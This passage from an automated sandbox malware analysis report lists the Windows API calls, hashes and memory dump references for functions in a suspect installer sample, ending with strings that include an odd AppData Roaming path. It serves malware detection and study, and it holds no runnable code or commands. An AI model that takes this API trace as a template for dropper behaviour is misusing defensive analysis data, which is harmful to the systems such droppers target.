                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                  • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                  • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                  • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405D52,?,?,00000000,00405F28,?,?,?,?), ref: 00406152
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406166
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                  • Instruction ID: c2cf34f9040e51e437c363cb0e130cc408ba31f940be0e29863539f2f5e5855d
                                                  • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                  • Instruction Fuzzy Hash: 34D0C976504220AFC2102728AE0889BBB55DB552717028A35F8A9A22B0CB314C6A8694
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                  • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                  • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                  • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                  • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                  • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                  • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                  • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                  • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                  • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 98b59753d3695c3a2bd97eb0930a10efb71c9d73d0a2adaa7b30d7aa1a9b7450
                                                  • Instruction ID: 5f0589e2f7e836fab386d1f6919c28a7b38457cd1aae352a9a933ca3b0ed34f2
                                                  • Opcode Fuzzy Hash: 98b59753d3695c3a2bd97eb0930a10efb71c9d73d0a2adaa7b30d7aa1a9b7450
                                                  • Instruction Fuzzy Hash: 28D05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B8C945A71D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
                                                  • Instruction ID: 8da91bbb186c2144be8ade9eda525c6e960391099661206c99069da2b113483a
                                                  • Opcode Fuzzy Hash: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
                                                  • Instruction Fuzzy Hash: 8AC04C717402007BDA209B609E49F0777545790740F1448397241E50E0DA75E450DA1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                  • Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
                                                  • Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                  • Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 00405CB7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                  • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                  • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                  • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,004043FA), ref: 0040462D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
                                                  • Instruction ID: 1e4f5f38d13ad7c97f33cdc532a4b6885827051f8054e7174c13f2a159251e9b
                                                  • Opcode Fuzzy Hash: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
                                                  • Instruction Fuzzy Hash: 7FA00176544900ABCA16AB50EF0980ABB72BBA8701B5288B9A285610348BB25821FB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD), ref: 00405762
                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                    • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                    • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                    • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                    • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                    • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: 44048a8e333b8626d351d99383c9f51ddaec9328707f455b78e6c36468e18e47
                                                  • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                  • Opcode Fuzzy Hash: 44048a8e333b8626d351d99383c9f51ddaec9328707f455b78e6c36468e18e47
                                                  • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 6edd9f19afa37a32878740e4ce22aca6ccefbb72779aa9fb6bfc1a3f769eccec
                                                  • Instruction ID: 012154cd729be1abc0cb1ed032b41b568871c5ce383e2dc5326efd784f8d2483
                                                  • Opcode Fuzzy Hash: 6edd9f19afa37a32878740e4ce22aca6ccefbb72779aa9fb6bfc1a3f769eccec
                                                  • Instruction Fuzzy Hash: 71D05E73A142018BD710EBB8BE854AF73A8EA403193204C3BD142E1191E6788902861C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                  • lstrcmpiW.KERNEL32(: Completed,00422F48,00000000,?,?), ref: 00404C59
                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 00404C65
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                    • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                    • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\87tBuE42ft.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                    • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                    • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\87tBuE42ft.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                    • Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                  • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                    • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                    • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                    • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                  Strings
                                                  • : Completed, xrefs: 00404C53, 00404C58, 00404C63
                                                  • H/B, xrefs: 00404BEF
                                                  • C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver, xrefs: 00404C42
